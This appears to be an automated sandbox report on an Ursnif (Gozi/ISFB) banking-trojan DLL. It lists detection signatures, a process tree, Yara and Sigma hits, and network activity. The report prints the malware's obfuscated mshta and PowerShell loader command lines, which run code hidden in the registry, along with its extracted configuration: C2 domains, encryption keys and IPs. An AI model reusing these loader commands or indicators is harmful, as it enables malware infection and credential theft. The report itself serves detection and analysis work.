Windows Analysis Report 61b85f75e6a7c.dll

Overview

General Information

Sample Name: 61b85f75e6a7c.dll
Analysis ID: 539453
MD5: 26788bdf519813ff2600570a5c8e23d9
SHA1: 44f22a053e84cd7afcf34a4fa19dbf512c8a624d
SHA256: 25f74513f1f0a72453bf096337daba7268bf77371f7fc210f56672f52b7b3af1
Tags: brt, dll, exe, gozi, isfb, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
PE file has a writeable .text section
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6132 cmdline: loaddll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 7004 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7056 cmdline: rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 160 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • regsvr32.exe (PID: 7016 cmdline: regsvr32.exe /s C:\Users\user\Desktop\61b85f75e6a7c.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 5952 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 7084 cmdline: rundll32.exe C:\Users\user\Desktop\61b85f75e6a7c.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • control.exe (PID: 5832 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • control.exe (PID: 5116 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • mshta.exe (PID: 2528 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxum='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxum).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6496 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES391B.tmp" "c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3760 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • mshta.exe (PID: 2596 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1472 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6428 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 3688 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Acrf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acrf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5796 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6312 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4531.tmp" "c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 5724 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sou4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sou4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4904 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4928 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp; Rule: JoeSecurity_Ursnif; Description: Yara detected Ursnif; Author: Joe Security
Source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp; Rule: JoeSecurity_Ursnif; Description: Yara detected Ursnif; Author: Joe Security
Source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp; Rule: JoeSecurity_Ursnif; Description: Yara detected Ursnif; Author: Joe Security
Source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp; Rule: JoeSecurity_Ursnif; Description: Yara detected Ursnif; Author: Joe Security
Source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp; Rule: GoziRule; Description: Win32.Gozi; Author: CCN-CERT
  • Strings: 0xff0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 6F 00 75 00 72 00 6E 00 61 00 6C 00 00 00 4F 50 45 52 41 2E 45 58 45 00

Sigma Overview

System Summary:

Sigma detected: MSHTA Spawning Windows Shell
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2596, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 6448
Sigma detected: Suspicious Call by Ordinal
Source: Process started; Author: Florian Roth; Data: Command: rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7004, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1, ProcessId: 7056
Sigma detected: Mshta Spawning Windows Shell
Source: Process started; Author: Florian Roth; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2596, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 6448
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5784, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline, ProcessId: 6620
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2596, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 6448
Sigma detected: T1086 PowerShell Execution
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132839797066077040.6448.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000002.671518506.0000000002E10000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}
Machine Learning detection for sample
Source: 61b85f75e6a7c.dll Joe Sandbox ML: detected
Source: 61b85f75e6a7c.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_0102D1A3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,0_2_010259E6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_0103F63F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053DF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_053DF63F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053CD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_053CD1A3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_053C59E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04ABF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,4_2_04ABF63F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AAD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,4_2_04AAD1A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,4_2_04AA59E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C3F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,5_2_04C3F63F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,5_2_04C259E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C2D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,5_2_04C2D1A3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103E230 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_0103E230

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: berukoneru.website
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 3.20.161.64 187
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 79.110.52.144 187
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: windows.update3.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 18.219.227.107 187
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 3.12.124.139 187
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: V4ESCROW-ASRO V4ESCROW-ASRO
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
          Source: loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
